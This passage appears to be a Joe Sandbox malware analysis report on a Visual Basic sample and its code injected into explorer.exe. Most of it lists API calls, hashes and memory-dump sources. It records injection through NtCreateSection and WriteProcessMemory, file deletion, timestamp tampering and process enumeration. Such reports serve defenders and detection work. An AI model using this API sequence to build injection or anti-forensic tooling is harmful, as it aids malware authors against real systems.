					E0FA32F5D(_t16, _t6);
					_v44 = 0xfa315b3;
					E0FA32F5D( *_t27( &_v44), _t30);
					return _t30;
				}
			}

0x0fa85ae7
0x0fa85af4
0x0fa85af8
0x0fa85b58
0x0fa85afa
0x0fa85b00
0x0fa85b06
0x0fa85b11
0x0fa85b13
0x0fa85b18
0x0fa85b1c
0x0fa85b26
0x0fa85b28
0x0fa85b2d
0x0fa85b31
0x0fa85b3a
0x0fa85b47
0x0fa85b51
0x0fa85b51

APIs

Part of subcall function 0FA85B60: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00004000,00000000,80000284,00056ED2,00057158), ref: 0FA85BAD
Part of subcall function 0FA85B60: __vbaAryLock.MSVBVM60(00000000,?,80000284,00056ED2,00057158), ref: 0FA85BC2
Part of subcall function 0FA85B60: #644.MSVBVM60(0FA31200), ref: 0FA85BDF
Part of subcall function 0FA85B60: __vbaAryUnlock.MSVBVM60(00000000), ref: 0FA85BEB

RtlFillMemory.KERNEL32 ref: 0FA85B00
#644.MSVBVM60(?), ref: 0FA85B11
#644.MSVBVM60(00000000,00000000,00000008), ref: 0FA85B26
#644.MSVBVM60(00000016,00000000,00000004), ref: 0FA85B43

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: #644$__vba$FillLockMemoryRedimUnlock
String ID:
API String ID: 3936800598-0
Opcode ID: b328a7d11c36b9f7844aa403359c7c07b590054529044dcee71057d2847462ba
Instruction ID: d040a118cd6e3ec841a452944cb0730975f8085e65f77d2d81f2df4ff48a4640
Opcode Fuzzy Hash: b328a7d11c36b9f7844aa403359c7c07b590054529044dcee71057d2847462ba
Instruction Fuzzy Hash: 6D0178B6A01311ABC220EBA4DD48E9BBBE8EFC4761F10891DF55997240D778D409CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4BF90 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__vbaVarVargNofree.MSVBVM60(0005703E,00000000,00056ED2,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFC7
__vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD2
#644.MSVBVM60(00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD9
__vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFE5

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644FreeNofreeVarg
String ID:
API String ID: 1185345826-0
Opcode ID: 579766293954fcc10833933cd59d34e4d9bc7a5dd74b66474a422f388c44dad3
Instruction ID: d9f27efa35a3d603faed923cff61f9abfd6966884b9643991d2dbcbfa331c731
Opcode Fuzzy Hash: 579766293954fcc10833933cd59d34e4d9bc7a5dd74b66474a422f388c44dad3
Instruction Fuzzy Hash: E4F0F9B5D00209EBCB00EFE4C94AADFBFB8FB48751F00451AF505E2101EA3895558FB1

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4A4D0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__vbaVarVargNofree.MSVBVM60(?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4A507
__vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4A512
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4A519
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4A525

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644FreeNofreeVarg
String ID:
API String ID: 1185345826-0
Opcode ID: 4224e8cd407f39f699289999119d4a0611d9919d7acea6e9c733c6ffb9814953
Instruction ID: 3c5d1597d8787325c5cba8adcea44893780bf01cda770cfbd0f3f97ed4571ff3
Opcode Fuzzy Hash: 4224e8cd407f39f699289999119d4a0611d9919d7acea6e9c733c6ffb9814953
Instruction Fuzzy Hash: 77F0F9B5C40249EBCB00EFA4D949AEFBFB8FF59611F40451AB502E2101E67855558BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 1860, Parent PID: 1664COMMON

Execution Graph

Execution Coverage:	32.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.5%
Total number of Nodes:	189
Total number of Limit Nodes:	29

Executed Functions

Function 02933044 Relevance: 7.9, APIs: 5, Instructions: 352
nativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 029346A8: NtCreateSection.NTDLL ref: 02934710

NtQueryInformationProcess.NTDLL ref: 02933231
NtQueryInformationProcess.NTDLL ref: 02933259
ReadProcessMemory.KERNEL32 ref: 0293328C
ReadProcessMemory.KERNEL32 ref: 029332BA
WriteProcessMemory.KERNEL32 ref: 02933337

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
String ID:
API String ID: 1349948393-0
Opcode ID: 312edb4158d0217b1c30ae4972e135a6e5094df5dcbc09da62ae87b8dc7ee2e7
Instruction ID: 728c9bbbf6e2653d31f616e61062ee75ad8f17224de71219bfc2336b9fff9981
Opcode Fuzzy Hash: 312edb4158d0217b1c30ae4972e135a6e5094df5dcbc09da62ae87b8dc7ee2e7
Instruction Fuzzy Hash: 1CB18231A18A489FDB19EF6CD8456E9B7E1FB98300F04427ED84AE3255DF30E9068BD5

Uniqueness

Uniqueness Score: -1.00%

Function 029350A4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32 ref: 029350D9

Strings

%02X, xrefs: 02935154

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: AcquireContextCrypt
String ID: %02X
API String ID: 3951991833-436463671
Opcode ID: 9858ff78696d147a800281c8cadc0453e2f5d558dc07f15888350ced5f57ed3a
Instruction ID: c2c3a9fada0ffb41ebb73e9873f5cbfd0f2028e5609315e64f21795ad495723e
Opcode Fuzzy Hash: 9858ff78696d147a800281c8cadc0453e2f5d558dc07f15888350ced5f57ed3a
Instruction Fuzzy Hash: 04316E30618A4D9FCB58EF68D8886EDB7A1FB9C305F01063DE89ED3241DF34A8459B95

Uniqueness

Uniqueness Score: -1.00%

Function 029346A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 02934710

Strings

@, xrefs: 02934728

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: CreateSection
String ID: @
API String ID: 2449625523-2766056989
Opcode ID: 369f72818fd0352128ce03bb48489f12db1784a77fba6ac46942ffe515edd250
Instruction ID: c6524b6e18a0e70626d709a3249e21bbaa3dbb8ae1f350b36ba1bad210614ed2
Opcode Fuzzy Hash: 369f72818fd0352128ce03bb48489f12db1784a77fba6ac46942ffe515edd250
Instruction Fuzzy Hash: 3F317C70918A488FCB94DF58D8897AABBF4FB59305F51166EE85EE3261DB30D840CB81

Uniqueness

Uniqueness Score: -1.00%

Function 028C3C88 Relevance: 3.1, APIs: 2, Instructions: 72processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 028C3CAA
SleepEx.KERNEL32 ref: 028C3D2C

Memory Dump Source

Source File: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, Offset: 028C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28c1000_explorer.jbxd

Yara matches

Similarity

API ID: CreateSleepSnapshotToolhelp32
String ID:
API String ID: 684154974-0
Opcode ID: 1b14472417680c56f1787f8d9447c2c8e70de4a0e1a072d33a8f1636923cf41b
Instruction ID: 89da25405d91bb8d001aee5fb2395d0fd34f48491d31d0fd50a69d6c4f632fef
Opcode Fuzzy Hash: 1b14472417680c56f1787f8d9447c2c8e70de4a0e1a072d33a8f1636923cf41b
Instruction Fuzzy Hash: 5221DA381146088FEB58EF64C0987AA73E2FB88319F2486BEE54FDE145DB34D5468751

Uniqueness

Uniqueness Score: -1.00%

Function 02933670 Relevance: 1.9, APIs: 1, Instructions: 404comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 029336BD

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: bbde511a2d1288e033ad95daf0aa9ab5005df2a86d1bcef6e25573cc9144a64d
Instruction ID: dce402a2dc178d873a4c4d58fc7a6b2603200dfd95204ae3ce9351190c7ec7c4
Opcode Fuzzy Hash: bbde511a2d1288e033ad95daf0aa9ab5005df2a86d1bcef6e25573cc9144a64d
Instruction Fuzzy Hash: D9E1FB34608A4C8FCB94EF68C885E99B7F1FFA9305F114699E44ACB265DB70E944CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02933518 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0293356C

Part of subcall function 02933670: CoCreateInstance.OLE32 ref: 029336BD

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInstanceNameUser
String ID:
API String ID: 3213660374-0
Opcode ID: f98c67a042497d817a1a45f22e6a7b77d1a9199de15bca305654157c3fb76f3e
Instruction ID: 80e9ebff865636ffad47f027e2a0f2675a2e7d26fb48e087f41ad5314745c7f2
Opcode Fuzzy Hash: f98c67a042497d817a1a45f22e6a7b77d1a9199de15bca305654157c3fb76f3e
Instruction Fuzzy Hash: E511F530718B4C4FCB90EF6C801835AB6D2FBDC300F914AAE984EC7255DA788A458B81

Uniqueness

Uniqueness Score: -1.00%

Function 029319A0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 299
threadmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateHeap.NTDLL ref: 02931AB7
LoadLibraryA.KERNEL32 ref: 02931AE2
CreateThread.KERNEL32 ref: 02931C72
CloseHandle.KERNEL32 ref: 02931C7B
CreateThread.KERNEL32 ref: 02931C99

Strings

iP+, xrefs: 02931C02

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: Create$Thread$CloseHandleHeapLibraryLoad
String ID: iP+
API String ID: 2806579993-51890417
Opcode ID: 4916780329818a54a514e1ccda52f86c7a6d7638f801302844bf1f2dec1d524e
Instruction ID: e208d24ccdeb25abb7536060446667b76de3b1c8fe07954d26d2ec9c3a67b301
Opcode Fuzzy Hash: 4916780329818a54a514e1ccda52f86c7a6d7638f801302844bf1f2dec1d524e
Instruction Fuzzy Hash: E891A330618A098FCF15EF28D8856A973EAFF98301B04457EDC4ECB26ADB34D541DB96

Uniqueness

Uniqueness Score: -1.00%

Function 02931ED4 Relevance: 7.7, APIs: 5, Instructions: 170
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,C7D149A4,02931E4D), ref: 02931F5D
CopyFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,C7D149A4,02931E4D), ref: 02931F6C
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,C7D149A4,02931E4D), ref: 02931F7D
DeleteFileW.KERNEL32 ref: 02931FC8

Part of subcall function 02934860: SetFileAttributesW.KERNEL32 ref: 029348AF
Part of subcall function 02934860: CreateFileW.KERNEL32 ref: 029348D9
Part of subcall function 02934860: SetFileTime.KERNEL32 ref: 02934904

CreateFileW.KERNEL32 ref: 02932051

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: File$Delete$Create$AttributesCopyTime
String ID:
API String ID: 642576546-0
Opcode ID: 9fb1b19699d4fdcd729a78c2e5b854bd18ef94b28a8ef920719ebb623bc6bd3d
Instruction ID: 2703834cd2c1b745c2a604f5337df0c3210e9dde808747361bdc7a2ff9fa6d1a
Opcode Fuzzy Hash: 9fb1b19699d4fdcd729a78c2e5b854bd18ef94b28a8ef920719ebb623bc6bd3d
Instruction Fuzzy Hash: 75414B30718A5C4FCBA9EF6894187AE76D2FBDC300F5145AE980EC7385DE389D098B85

Uniqueness

Uniqueness Score: -1.00%

Function 02933C88 Relevance: 7.6, APIs: 5, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 02933CAA
Process32First.KERNEL32 ref: 02933CC9
Process32Next.KERNEL32 ref: 02933D14
CloseHandle.KERNEL32 ref: 02933D21
SleepEx.KERNEL32 ref: 02933D2C

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: 1b14472417680c56f1787f8d9447c2c8e70de4a0e1a072d33a8f1636923cf41b
Instruction ID: 4ed5eee04df982f3db5203d5d28c40dcac8b29417383390a32dbec7ed26d6d63
Opcode Fuzzy Hash: 1b14472417680c56f1787f8d9447c2c8e70de4a0e1a072d33a8f1636923cf41b
Instruction Fuzzy Hash: E821E430114A088FDB19EF64C0987AA72E2FF88315F080ABEE84FDE185DB349545C795

Uniqueness

Uniqueness Score: -1.00%

Function 029322DC Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 498
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 029324C1
CreateFileW.KERNEL32 ref: 029324EB
WriteFile.KERNEL32 ref: 0293254C

Strings

|:|, xrefs: 02932402

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteWrite
String ID: |:|
API String ID: 2199199414-3736120136
Opcode ID: 3bd7b398296a2c2da1e3fa60d725dea4b8b57855a6d88d8621728633dcf1877a
Instruction ID: bb76270ff2bee3c289a709162de3932c6f12f2818f6c43ca4337089088c067c0
Opcode Fuzzy Hash: 3bd7b398296a2c2da1e3fa60d725dea4b8b57855a6d88d8621728633dcf1877a
Instruction Fuzzy Hash: EAE1A330718F488FE75AAB68C4587AA76D1FB88315F50452ED89FC3281DF78ED428B85

Uniqueness

Uniqueness Score: -1.00%

Function 028C19A0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 299
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateHeap.NTDLL ref: 028C1AB7
CreateThread.KERNEL32 ref: 028C1C72
CreateThread.KERNEL32 ref: 028C1C99

Strings

iP+, xrefs: 028C1C02

Memory Dump Source

Source File: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, Offset: 028C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28c1000_explorer.jbxd

Yara matches

Similarity

API ID: Create$Thread$Heap
String ID: iP+
API String ID: 1054751041-51890417
Opcode ID: 6da4afaad102f4247ddece5d1023f80c48d2f509dfb7ed5bac28218ccf0da55c
Instruction ID: 40ee6e395d73d9c44f2dd3dade1b9af104ad573f0fc8d6ee87224a67428374b6
Opcode Fuzzy Hash: 6da4afaad102f4247ddece5d1023f80c48d2f509dfb7ed5bac28218ccf0da55c
Instruction Fuzzy Hash: 7591C138618A088FDF14EF28D8C96A973D6FB98300B14417EDC4ECB15ADB34D551DB96

Uniqueness

Uniqueness Score: -1.00%

Function 02932CAC Relevance: 4.8, APIs: 3, Instructions: 330
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02933378: CreateFileW.KERNEL32 ref: 029333BE
Part of subcall function 02933378: ReadFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,00000000,00000001,02932282), ref: 02933405

CreateProcessInternalA.KERNEL32 ref: 02932EB9
ResumeThread.KERNEL32 ref: 02932F8B
SleepEx.KERNEL32 ref: 02932FDE

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile$InternalProcessReadResumeSleepThread
String ID:
API String ID: 2121310070-0
Opcode ID: 8ecd36a3eee076c9ac3e3273ee66ee170c948151caac28b5e6f4f065592a1240
Instruction ID: c1e9f995867ba64931f129ee5a0bb6b908cf0f4c1de1a8007e39c2c51d7151a8
Opcode Fuzzy Hash: 8ecd36a3eee076c9ac3e3273ee66ee170c948151caac28b5e6f4f065592a1240
Instruction Fuzzy Hash: 7FA1A430B08A498FDB59EF78C4987A9B7E2FB98301F54462ED45AC7255DF34A842CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02934D30 Relevance: 4.6, APIs: 3, Instructions: 122
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32 ref: 02934D71
RegQueryValueExA.KERNEL32 ref: 02934DB5
ObtainUserAgentString.URLMON ref: 02934E1E

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: AgentObtainOpenQueryStringUserValue
String ID:
API String ID: 2350182032-0
Opcode ID: d355c76016ac6fb558edb89ba5e36016925166caacb9901941ce1adbdb8fb589
Instruction ID: 67d83f156f7a4196ea3c63a0c8c2fd88107a28513e361f62fd422e9f5d707868
Opcode Fuzzy Hash: d355c76016ac6fb558edb89ba5e36016925166caacb9901941ce1adbdb8fb589
Instruction Fuzzy Hash: A131B731608A4C8FDB19EF68D8896EA77E6FB9C314B01067EE85EC7145EF7098058BD1

Uniqueness

Uniqueness Score: -1.00%

Function 02931D5C Relevance: 4.6, APIs: 3, Instructions: 121
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02934BC0: GetVolumeInformationA.KERNEL32 ref: 02934C2D

CreateMutexExA.KERNEL32 ref: 02931DCF
CreateFileMappingA.KERNEL32 ref: 02931E81
SleepEx.KERNEL32 ref: 02931EBE

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: Create$FileInformationMappingMutexSleepVolume
String ID:
API String ID: 3744091137-0
Opcode ID: 06eca581386b458f401d7cc0ecf924fecce36b3dc31e7b32476a170e67e1fa8a
Instruction ID: aed23ad1ea7e243df07e47d8d484007674fc09b5db6a996396fa0858f7a3f496
Opcode Fuzzy Hash: 06eca581386b458f401d7cc0ecf924fecce36b3dc31e7b32476a170e67e1fa8a
Instruction Fuzzy Hash: 26419130B14F088FDB66EF3880187AEB2D2EFD8706F504A2E845FD6250CF759A068B41

Uniqueness

Uniqueness Score: -1.00%

Function 02934860 Relevance: 4.6, APIs: 3, Instructions: 84
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNEL32 ref: 029348AF
CreateFileW.KERNEL32 ref: 029348D9
SetFileTime.KERNEL32 ref: 02934904

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateTime
String ID:
API String ID: 1986686026-0
Opcode ID: 270840e7dc60b8d8c67b490d001ddd330a1ea31012c8dce24f7a857c92715d36
Instruction ID: a88f61f3eded7c9564a2640db90ef35e48a256e387714e9cb09f7bf285f29068
Opcode Fuzzy Hash: 270840e7dc60b8d8c67b490d001ddd330a1ea31012c8dce24f7a857c92715d36
Instruction Fuzzy Hash: C621003071CA4C8FDF64EF68948879EB6E2FBDC701F10456EA84EC7255DA34DA058782

Uniqueness

Uniqueness Score: -1.00%

Function 028C18BC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32(?,?,?,?,?,?,?,028C1943), ref: 028C1970

Strings

at<r, xrefs: 028C18DB

Memory Dump Source

Source File: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, Offset: 028C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28c1000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: at<r
API String ID: 3472027048-1021240857
Opcode ID: 525ce396e8b019457954cbadb47c8958b3d6251e1529a20b09ebb03270ed986e
Instruction ID: 2cc87f9c04500819633b7297bf549270f1cd9d9871a713e4b5f092e7636684a7
Opcode Fuzzy Hash: 525ce396e8b019457954cbadb47c8958b3d6251e1529a20b09ebb03270ed986e
Instruction Fuzzy Hash: E4214B2950E7C54FD747A73888882647F60EF06255FA801EED44DCB0E3D774C848C792

Uniqueness

Uniqueness Score: -1.00%

Function 029318BC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32(?,?,?,?,?,?,?,02931943), ref: 02931970

Strings

at<r, xrefs: 029318DB

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: at<r
API String ID: 3472027048-1021240857
Opcode ID: fc5027bb3077c03cf895c2349d0bd06dfc6389530abb21d62236516a04b98c9e
Instruction ID: a2daabcee6e0147a900d22d4a5c17c9ec4a0987876b4529e1fb15eba4723630b
Opcode Fuzzy Hash: fc5027bb3077c03cf895c2349d0bd06dfc6389530abb21d62236516a04b98c9e
Instruction Fuzzy Hash: 3C21372161EB844FDB47AB74D8892A47F71EF46351F9900EEC859CF0F3D6688848C752

Uniqueness

Uniqueness Score: -1.00%

Function 02933378 Relevance: 3.2, APIs: 2, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 029333BE
ReadFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000001,?,00000000,00000001,02932282), ref: 02933405

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateRead
String ID:
API String ID: 3388366904-0
Opcode ID: 6fc90229325e27ef84ec7739ce5d8b512f9a2f8fb4bc0c79474dc742f6af157d
Instruction ID: dd615e2a541d5173939152f04640b3af7dc483c7f8f6c6c66c78809bcf3b4bcc
Opcode Fuzzy Hash: 6fc90229325e27ef84ec7739ce5d8b512f9a2f8fb4bc0c79474dc742f6af157d
Instruction Fuzzy Hash: 4041BF3031CB0D0FD75DAB6C98583BAB2C2FBC8321F55026EA59FC3255DE24980247C6

Uniqueness

Uniqueness Score: -1.00%

Function 02934980 Relevance: 3.1, APIs: 2, Instructions: 81COMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 029349CC
GetTokenInformation.ADVAPI32 ref: 029349FC

Memory Dump Source

Source File: 00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp, Offset: 02931000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2931000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 14d4bf7f85d09f3fdab49d0ff0fe5e3b0fa0c3a2930bd780768309a6192de147
Instruction ID: aa2031c390782c4783fc0b3a8db283b289cff1d80868c50288aff098ce25476a
Opcode Fuzzy Hash: 14d4bf7f85d09f3fdab49d0ff0fe5e3b0fa0c3a2930bd780768309a6192de147
Instruction Fuzzy Hash: 64216530608B498FC754EF2CC48466AB7F1FFD9310B014A6EE49AD7264CB70E805DB81

Uniqueness

Uniqueness Score: -1.00%

Function 028C3D64 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 028C3D80
SleepEx.KERNEL32 ref: 028C3D8B

Memory Dump Source

Source File: 00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, Offset: 028C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28c1000_explorer.jbxd

Yara matches

Similarity

API ID: EnumSleepWindows
String ID:
API String ID: 498413330-0
Opcode ID: 59fb6a7732f5aea67854b90e5282ebabce3ba5b56b1c4f5de79b72ce498ffebc
